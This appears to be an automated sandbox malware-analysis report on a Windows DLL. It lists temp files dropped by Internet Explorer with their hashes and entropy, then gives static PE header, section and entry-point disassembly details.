SHA-512:	18FBFBF7AE3FC878048E25AA833DDB62E5F3CE8F83DF97C2C709900AC99927AC0EA63781EDDF725D10204681A1FC5EF2509690AF1F33854811E8326BEC3808A9
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF14922433FF127DCA.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40161
Entropy (8bit):	0.6679068741529088
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+npLCJ8igg1uligg1uqigg1u3:kBqoxKAuqR+npLCJ82ul2uq2u3
MD5:	075505C9647A6033C9EAED450172167E
SHA1:	41E041CDB60138CF1BA63FCD73FB8B28BC549FE7
SHA-256:	478CE38AEB19D26BC0A55848EA19E7A52AB1B11A8BF99E8A7020408F7BAC1674
SHA-512:	4F7444B88DDC13F600457B5D212ACB890235E6E7F934B583E4D3FFED875E30A2EB5F239328BDC349A3617F5C35EA43517E80065E40E9EA1304E70F401C1E44D8
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF18426F049004E0E1.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40089
Entropy (8bit):	0.6609136620323622
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+gm89mbwQRk4owQRk4bwQRk4M:kBqoxKAuqR+gm89mbwQy7wQykwQyB
MD5:	6111309E829E71C0B293E3422D48C974
SHA1:	8DF6BAFFBA76964E27406D99FDFAC818230ED1EA
SHA-256:	5FCCE670222BFF9EA186C21A192F0A50FE7AC16E373BE04B3956C7F13AEAE66F
SHA-512:	0A6CBCE7DD266BD6D90A3AB967B5C678DF51B6C25DA6AFB3F91EF013889B389DD001DF2DFF88E26D681ED3B94286F61CB5C530C94D77675EF31AF27192C68972
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF2574ADFCE17069FC.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40105
Entropy (8bit):	0.6621356313644257
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR++4y7oZe6H+C+e6H+CRe6H+Ci:kBqoxKAuqR++4y7oZqC+qCRqCi
MD5:	27180C146D4CC5E779CDD0B6FD9B5B21
SHA1:	9173811DA15D435A613A7F3E798A7C88A80DB08D
SHA-256:	1F01634AD9BCEA5B914B570818CA0B97D686D2E058CC903D13F7CECE346518C1
SHA-512:	EF8215C9EC4F1AE9AB8FB525A8B66B85B095A9273C6B7E3C9C4C72BB828FAB541E28DB8EAB8BAD70CD01C6219805C159BFEA44B13266A760173DB1544A838CE7
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF27C4A73E9E9B002F.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40121
Entropy (8bit):	0.6632433212863169
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+pHVEn6AmpLA859HpU6AmpLA859HpUtAmpLA859HpUe:kBqoxKAuqR+pHVEn6V+8t9V+8tmV+8tL
MD5:	D14B6BF7660D488807B36365CCB9FCD6
SHA1:	1141941E7F8297CD580F1A785C6E5851FD144CCB
SHA-256:	C7840CA8A16BF8A5A24373116B936ED8FA0026BBBAEC6AAC42E4C05D460FED3E
SHA-512:	E72D03D00CF8638DC98CA925163E5EE56107CCFD3F55B84B0734195DAE625528E367ACE68F1A1D117B5E3A7C1CF0D68DC8174C043F74D61F25AE108E49014DCA
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF502FB81A68309E09.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40025
Entropy (8bit):	0.6480281123612174
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+HJripYWIleLXoWIleLX7WIleLXs:kBqoxKAuqR+HJripY3lsXo3lsX73lsXs
MD5:	7A8AFD1D36F75CEA877E8DF9281B2AD0
SHA1:	760B23A263CE2DDBCB3195889E1978733143A66D
SHA-256:	DE2309A981B0D88A921F96672DA017044DF326B61ED78CFE063A32C1958BE391
SHA-512:	D7EAF58B2543F48C709EFB6123C43BD440419A57F3FBA3C3C2F8EBD11D109FE12EDA35C106326C15F83CD5D50E4CA9DA9F83749DD52564D5C6AF05EA15A39E18
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF62C16093667F7810.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40065
Entropy (8bit):	0.6555531294014514
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+ouk1enf0lDLUJTju4f0lDLUJTjuR0lDLUJTjuC:kBqoxKAuqR+ouk1ef0lUZz0lUZw0lUZt
MD5:	5FD623516A37A837A06D9FBE1D11F4E7
SHA1:	B4AB36690EDD7F2E4481968C5D9FD35828D2ED0A
SHA-256:	2D9E33B73EE8DC0C7AD8E1A1FC33A6051C43B22A896B5C43342A23FD992FB022
SHA-512:	E00DAE0B10C87E7F43D214FCE8E9F9DF911FA61BE78E26419D51B70C77094D21FED1F9C88640528DA7D84F0D91D6BBE165ED6FD5C1E57F0446A378B1AA4E2BDD
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF9E90F1D74363A308.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	35089
Entropy (8bit):	0.4765570025078589
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+0L0F0X0+0F0Iy8svrx2sdAm:kBqoxKAuqR+2wqDwdyrw0
MD5:	C0F2E4455901941DEA4FEC1EF0D1493A
SHA1:	35E6ACA8A5113596401EB09E28684E9F94853E95
SHA-256:	DFAD31CDE04D8036D7114164102E25F451C109EC4BDDE6B184E0FE10B076E18B
SHA-512:	ABEC3495D5C922E7D3FBA5075652307FDB81D089CF8D796EF6971C29DEDB1B71E66325F9BCE61A6302D7C53C835C955593FB94DC41AF4B1892EE98D9B568CF67
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFAC413DF3F6F47877.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40177
Entropy (8bit):	0.6765135764903023
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+zN/2dYvoG+/TMDvoG+/TMLsvoG+/TM1:kBqoxKAuqR+zN/2dYvFDvFovF1
MD5:	E55DEA1172EECF901EAA35E14C405DED
SHA1:	AD6BB6FE781AD356ABE934F089E45C8287C41BDD
SHA-256:	DE6C0093B357C2D6141017E4F17B3CA3F734A90BD39AF7AE3016DF6027FB1D33
SHA-512:	EA79B537424E53817CCCC0FAF843384E370AFBA2AA695D6524F3B3C74EBFE817048FDB40B1FA56E6ADB8A9BD2A6F1C04179EE1C4D184A1819DA1D9634E6BF8DA
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFB3DC86A942CB5054.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40041
Entropy (8bit):	0.651829897716935
Encrypted:	false
SSDEEP:	384:kBqoxKAuqR+nMnqnwnRnanf5wsZOg5wsZO75wsZOc:3kSIRCBJZOeJZOVJZOc
MD5:	AC4E308600FDA388F9D8CE3DE416F5D1
SHA1:	E3A1199EF3F2062F1966A60E3E6B56C4949D25B0
SHA-256:	9978C92C4A14F369B1ED41C4803F3CE76ECBDBB8DF8555F5849702B9C21D7BF2
SHA-512:	DD42BB570624A09D7A04D65927C50A31E37EB44A140BBD03414898761C261F9E91F1D54923D805EEC201E49D939E6E9BE14B7E9975B9330D989E90029C3C0DB4
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFBC3CF1F21C760D39.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40193
Entropy (8bit):	0.6802760742087735
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+3M3q3w3R3a3bp5fcp5fDp5fM:kBqoxKAuqR+c6gBqrncnDnM
MD5:	1F4F516E70E947125426FBE9222D72A3
SHA1:	DB10B9F4365321B398E9360FD331F4A8C8972B4D
SHA-256:	514FA6D9666F6FAC4A69F95D8209CF608E3E43F0082F74CE7C7AA76A52F305A3
SHA-512:	DDEB23C9DCAA6DAF1F1A55F410716AD6A64972765ED10161BBCF04B801064229D3A7F348F7768B4149B42F3472948C540C674C372B08F7849A50819F72C060F1
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFC4C7CEA8FE8348E1.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40217
Entropy (8bit):	0.6823481780015891
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+HJrip4QbK7AHQbK7AYQbK7AV:kBqoxKAuqR+HJrip4EoUEovEoA
MD5:	7792A02E8BD0437E8189887D170321E8
SHA1:	C76F4E8CEA8E947B865B8F49B99161DCBAC5DBA2
SHA-256:	6C816782EF318473DD60840D31BEC2BB4D0894C2FAD1FA77237F880C62CFB991
SHA-512:	C92F7102A9DFE027B525EB8580C5267B0B2B6E0B9F620DAB303801C6CD71521DD15C448704C8679F26CF64054B8E67F92D74358B02A05845244EE28205D5B996
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFCB466DF04067B9CF.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40113
Entropy (8bit):	0.6619280909719542
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+Ks2/sByKZP27yKZP2TMyKZP29:kBqoxKAuqR+Ks2/sBM7MTMM9
MD5:	A8F809A1F5B782FAA1A720E06EE866AE
SHA1:	2A207F8AD19E0A33996F4CA4E8EF431E27EA2026
SHA-256:	F5C5A9AF0E8E207DD029AEDE694886C9C4217D549A75446FAECDA80127D2314D
SHA-512:	4FC40F2C253A32FB50190A57C98258711C286DABF929430E96F1A575FDDE507EB1EC6FBADA57FD5A76D8D89C6C11CC8F62DAF47AF4BB92B0C25D9E0332EE45FE
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFDAF305825D1F4F98.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40161
Entropy (8bit):	0.6719340121207843
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+QWMNWncIcVtIOecIcVtIO1cIcVtIO2:kBqoxKAuqR+QWMNWnRcVtyRcVt5RcVtK
MD5:	99F4B6BE21E8B16D706D1EBB51738A11
SHA1:	2CAEDD4EF75823E61138A2C0FF5DF39378F7AAED
SHA-256:	0CEAD325E9F09B32209E8CDE9FD218823B2499883B1325A0EB0F7B91198275AA
SHA-512:	AE614A26CD68DEDF658B62FAD668E24CBE2741AF3D5F68D9DC5F10CE6636858B5ECB2A1BA803242AAE89848FABC16B057213B5032B6E03ED0CBCBFC8C12F56B1
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFDD7DD7DF00A7D862.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	40161
Entropy (8bit):	0.675060552459281
Encrypted:	false
SSDEEP:	192:kBqoxKAuqR+tltLtptYt7t6/Ftw/FtH/FtQ:kBqoxKAuqR+tltLtptYt7t6/Fm/Fd/F+
MD5:	B311C2E1B20D9A0B5956A6472795B32B
SHA1:	757FC9B66072166B80D3B271F54046A9F5E82CE7
SHA-256:	59028F790B2E0296FFDA8470E4D812A582D221FCB96007A59E27392DE497A230
SHA-512:	F2BD61A9D174B74AB5F88D5E173B43061AE81BE46F96AFAC9417956D67EA0F5DB80187D20F9DAF343A8E190387465725F2F0E82298A852858509EF21B3964468
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFF80766C3FDE4D880.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	372446
Entropy (8bit):	3.255276289300774
Encrypted:	false
SSDEEP:	3072:7Z/2Bfcdmu5kgTzGteZ/2Bfc+mu5kgTzGtRZ/2Bfcdmu5kgTzGt5Z/2Bfc+mu5kn:ihPO
MD5:	9D4E34E8EAB593A213B6D59E3428A6F1
SHA1:	1B9F9CFE93F2EE21605E3D5668A57B34F5699317
SHA-256:	FA84EB735AB280E13CB436502A8935FC7DD73869810F9FFFB8746DECCDAC1729
SHA-512:	C0024657AF994310F8BFD4E16C624E274E4A0F5CE6DEEA47AF77C8723C5C1E6009026A67E7CA728F18642807F04868EC3434AF583C34B0948B93DD488A8B57A2
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9GQPSGTWR2M1KG9TMGPH.temp Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	5149
Entropy (8bit):	3.1783776994470982
Encrypted:	false
SSDEEP:	96:gBPak19SWRAJOBPakW3SWRAXBPaku9SWRAf:K1B5uq
MD5:	B3F7C649BB3B13BCF6812D52123D3AED
SHA1:	885080461F895CF832E5151E253154775AFF7C6D
SHA-256:	DA531015F64F9A13C77D862FB896CB152D1544F4A536A437411D3A577249A868
SHA-512:	4EB5125EE43DF73F230FBAC690AEB18F71CC7E462A8C4C6A64BC15FD44E11EAACCB0012EE8CCE56147FBC5A5D77D8EED7D85EA6A6477B569B13D5EECA066CDDC
Malicious:	false
Preview:	...................................FL..................F.@.. .....@.>...B.Os.X....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.;..PROGRA~1..t......L..RM.....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L..RS...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J.RQ......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]...........-V.D.....C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GEBHCM5278GOE65SECTC.temp Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	5149
Entropy (8bit):	3.1783776994470982
Encrypted:	false
SSDEEP:	96:gBPak19SWRAJOBPakW3SWRAXBPaku9SWRAf:K1B5uq
MD5:	B3F7C649BB3B13BCF6812D52123D3AED
SHA1:	885080461F895CF832E5151E253154775AFF7C6D
SHA-256:	DA531015F64F9A13C77D862FB896CB152D1544F4A536A437411D3A577249A868
SHA-512:	4EB5125EE43DF73F230FBAC690AEB18F71CC7E462A8C4C6A64BC15FD44E11EAACCB0012EE8CCE56147FBC5A5D77D8EED7D85EA6A6477B569B13D5EECA066CDDC
Malicious:	false
Preview:	...................................FL..................F.@.. .....@.>...B.Os.X....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.;..PROGRA~1..t......L..RM.....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L..RS...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J.RQ......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]...........-V.D.....C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IR5J7T268M1IT46KQDKF.temp Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	5149
Entropy (8bit):	3.1783776994470982
Encrypted:	false
SSDEEP:	96:gBPak19SWRAJOBPakW3SWRAXBPaku9SWRAf:K1B5uq
MD5:	B3F7C649BB3B13BCF6812D52123D3AED
SHA1:	885080461F895CF832E5151E253154775AFF7C6D
SHA-256:	DA531015F64F9A13C77D862FB896CB152D1544F4A536A437411D3A577249A868
SHA-512:	4EB5125EE43DF73F230FBAC690AEB18F71CC7E462A8C4C6A64BC15FD44E11EAACCB0012EE8CCE56147FBC5A5D77D8EED7D85EA6A6477B569B13D5EECA066CDDC
Malicious:	false
Preview:	...................................FL..................F.@.. .....@.>...B.Os.X....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.;..PROGRA~1..t......L..RM.....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L..RS...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J.RQ......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]...........-V.D.....C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N8M5UGCOMP4R0QEMQYAT.temp Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	5149
Entropy (8bit):	3.1783776994470982
Encrypted:	false
SSDEEP:	96:gBPak19SWRAJOBPakW3SWRAXBPaku9SWRAf:K1B5uq
MD5:	B3F7C649BB3B13BCF6812D52123D3AED
SHA1:	885080461F895CF832E5151E253154775AFF7C6D
SHA-256:	DA531015F64F9A13C77D862FB896CB152D1544F4A536A437411D3A577249A868
SHA-512:	4EB5125EE43DF73F230FBAC690AEB18F71CC7E462A8C4C6A64BC15FD44E11EAACCB0012EE8CCE56147FBC5A5D77D8EED7D85EA6A6477B569B13D5EECA066CDDC
Malicious:	false
Preview:	...................................FL..................F.@.. .....@.>...B.Os.X....?.c................................P.O. .:i.....+00.../C:\.....................1.....>Q.;..PROGRA~1..t......L..RM.....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L..RS...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J.RQ......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]...........-V.D.....C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.059620117576318
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	1.dll
File size:	434690
MD5:	27955775dfd73e08550fa42f20a8ef14
SHA1:	69e19132abbe882d20d5cde2927ce0ae1c928457
SHA256:	23e30ba8de300b7a8d53acdefa9bdee1e607a965f4dd3c42b9385f408d6e77a8
SHA512:	391db79ef62bc38f936deebe03d005423f7073a67287f5aa36c46c289266064bdb0ca1a62577cb89266396cfdf5a928a78193442fe44de6f1ce3ac892321089c
SSDEEP:	6144:RlnV6WuQ+fPYJTzi+h81ZQnSJJB5Qu8Y12VAkuDeuF10:RlnV/uQzi+hoQnSJVQu8YRo
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........c...0...0...0.JT0...0..30...0d..1...0d..1...0d..1...0d..1...0.JO0...0...0...0d..1/..0d..1...0d._0...0d..1...0Rich...0.......

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x103bb07
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60AE75D2 [Wed May 26 16:22:42 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	b1ca0635fabbba9e927a6cd1a0e67edd

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FC8A8FCAC47h
call 00007FC8A8FCB169h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FC8A8FCAAF3h
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FC8A8FCA44Bh
push 01067CF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FC8A8FCB450h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FC8A8FC9160h
push 01067C24h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FC8A8FCB433h
int3
jmp 00007FC8A8FCEDF1h
push ebp
mov ebp, esp
and dword ptr [0107A6B0h], 00000000h
sub esp, 24h
or dword ptr [0106909Ch], 01h
push 0000000Ah
call 00007FC8A8FD6038h
test eax, eax
je 00007FC8A8FCADEFh
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
push ebx
cpuid
mov esi, ebx
pop ebx
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
xor ecx, ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-24h]
mov edi, dword ptr [ebp-1Ch]
mov dword ptr [ebp-0Ch], eax
xor edi, 6C65746Eh
mov eax, dword ptr [ebp-18h]
xor eax, 49656E69h
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp-20h]
xor eax, 756E6547h

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x68270	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x682c0	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7c000	0x3a8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7d000	0x15e4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6739c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x673f0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x48000	0x184	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x46a13	0x46c00	False	0.740130852473	data	6.56721818248	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x48000	0x20ba6	0x20c00	False	0.486171576813	data	4.23409229196	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x69000	0x120b0	0xc00	False	0.1923828125	data	2.58808627428	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x7c000	0x3a8	0x400	False	0.4033203125	data	3.10177388284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7d000	0x15e4	0x1600	False	0.791193181818	data	6.62336191862	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x7c060	0x348	data	English	United States

Imports

DLL	Import
